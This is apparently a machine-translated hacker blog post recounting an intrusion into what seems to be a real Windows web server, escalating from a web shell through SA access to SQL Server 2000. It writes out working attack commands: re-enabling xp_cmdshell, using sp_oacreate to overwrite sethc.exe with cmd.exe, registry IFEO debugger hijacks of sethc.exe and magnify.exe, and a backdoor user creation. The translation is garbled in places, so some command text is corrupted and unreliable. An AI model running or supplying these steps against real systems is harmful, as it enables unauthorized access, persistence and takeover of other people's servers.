Remember an interesting Elevation of Privilege

Shell is offered by dual-sided bulls. When I plan to read "xuanyuan sword", I am told that I am bored and let me see the Elevation of Privilege. I am not interested immediately. Why, I have not done anything about double-sided scalpers. Can I do it .. however, it is useless to see a movie at a speed. Just put it on your head!
 
First, it's aspx. First, scan the ports enabled.
 
MSSQL, MYSQL, and Serv-U corresponding to 43958.
Let's take a look at whether Serv-U can raise the right (PS: If it's so easy to handle it, will all look at me ?).
 
Tip: Unable to connect because the target machine is actively rejected.
Ask all-in-one Daniel, saying that the Serv-U service is suspended, then this road is blocked. Next let's take a look at the Command Execution
 
The built-in c: \ windows \ system32 \ cmd.exe cannot be executed, so let's try uploading a new readable directory.
 
Then try again
 
Then proceed to systeminfo to see
 
In fact, the focus is on patch information.
 
He said the patch was full. The cainiao did not believe it, and made multiple decisive tests. It was fruitless.
 
He suddenly said someone was passing by, so I can see if there is any trace left.
 
There are actually hidden accounts. It seems that KO was really miserable. After many attempts to use weak passwords, as I imagined, I did not go in, and said that RP is indeed the worst. Besides, there is no such weak password for the ox. Now that they are all dead, let's look at 1433 again.
 



The configuration file was successfully found. Hey, it's still mssql. There seems to be hope, but it's not... it's troublesome. Take care of him. Try the connection...
 
This character is not bad, but RP is actually SA and Microsoft SQL Server 2000.
So let's see if xp_cmdshell exists and directly add xp_cmdshell.
Use master dbcc addextendedproc ('xp _ javasshell', 'xp log70. dll ')
 
If the command exists, execute the command directly ..
Exec master. dbo. xp_mongoshell 'whoam'
 
Xpsql. cpp: Error 5 from CreateProcess (row 737th)
I have never met. Search. There are still a lot of people suffering from this problem. Original. The error 5th is the error number of the system prompt. createprocessthis is the idea of creating a thread. This error message has a lot to do with the System File cmd.exe. One is that the cmd is deleted, and the other is that the cmd permission is reduced.
It seems that the road is blocked, and then I think that there are two commands executed on pangolin. Besides xp_cmdshell, sp_oacreate can execute commands.
Use cmd to replace sethc ..
Declare @ o int exec sp_oacreate 'scripting. filesystemobject ', @ o out exec sp_oamethod @ o, 'copyfile', null, 'c: \ windows \ system32 \ cmd.exe', 'c: \ windows \ system32 \ sethc.exe ';
 
The sp_oacreate function cannot be found in the odsole70.dll library. Cause: 127 (the specified program cannot be found .). And then deleted.
However, I use declare @ o int exec sp_oacreate 'scripting again. filesystemobject ', @ o out exec sp_oamethod @ o, 'copyfile', null, 'c: \ windows \ system32 \ cmd.exe', 'c: \ windows \ system32 \ sethc.exe ';
The sp_oacreate function cannot be found in the odsole70.dll library. Cause: 127 (the specified program cannot be found .).
 
I didn't understand the reason. It took almost an afternoon. Still fruitless...
 
I suddenly saw IFEO hijacking while I was reading the book...
Since we are introducing the IFEO technology, let's first introduce: 1. What is IFEO )? The so-called IFEO is that the Image File Execution Options is located in the Registry's HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options because this item is mainly used for program debugging, it is of little significance to general users. By default, only the Administrator and local system have the permission to read and write modifications.
 
Let's start with an IFEO hijacking.
EXEC master .. xp_regwrite
@ Rootkey = 'HKEY _ LOCAL_MACHINE ',
@ Key = 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc. EXE ',
@ Value_name = 'debugger ',
@ Type = 'reg _ SZ ',
@ Value = 'C: \ WINDOWS \ system32 \ cmd.exe'
 
No error... Hey hey...
Check whether the hijacking is successful.
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc.exe', 'destoger'
 
DebuggerC: \ WINDOWS \ system32 \ cmd.exe
Hahaha... Actually succeeded.
 
Er... Shift does not work ..
 




 
Continue execution
EXEC master .. xp_regwrite
@ Rootkey = 'HKEY _ LOCAL_MACHINE ',
@ Key = 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe ',
@ Value_name = 'debugger ',
@ Type = 'reg _ SZ ',
@ Value = 'C: \ WINDOWS \ system32 \ cmd.exe'
 
Run the command to check whether the hijacking is successful.
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe', 'destoger'
 
I'm depressed, but I still cannot get out of it.
 
If the system is disabled, call the self-uploaded cmd
EXEC master .. xp_regwrite @ rootkey = 'HKEY _ LOCAL_MACHINE ', @ key = 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe', @ value_name = 'debugg ', @ type = 'reg _ SZ ', @ value = 'f: \ umail \ mysql \ cmd.exe'
 
I can't find my own, that is, I can't play it out. Then I encapsulated a bat and found that the user was not successfully added.
Then you will be prompted:
 
Continue
EXEC master .. xp_regwrite
@ Rootkey = 'HKEY _ LOCAL_MACHINE ',
@ Key = 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe ',
@ Value_name = 'debugger ',
@ Type = 'reg _ SZ ',
@ Value = 'f: \ umail \ mysql \ net1.exe user guset a123456789 // add'
Then run
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe', 'destoger'
 

It's successful, but it's probably the same. No matter what it is, check it out first.
 
Resource Manager and task management failed during this period.
 
Various egg pains
 
Still unsuccessful
 
Okay. Continue.
EXEC master .. xp_regwrite @ rootkey = 'HKEY _ LOCAL_MACHINE ', @ key = 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe', @ value_name = 'debugg ', @ type = 'reg _ SZ ', @ value = 'C: \ windows \ system32 \ shutdown-r-t 0'
View
Exec master.. xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ magnify.exe', 'destoger'
 
But it still does not restart. One night has passed and I still haven't done it.
Get up in the morning
 
Let's worship
 




 
 
Okay, I got it ..
 





 
Thank you for your guidance.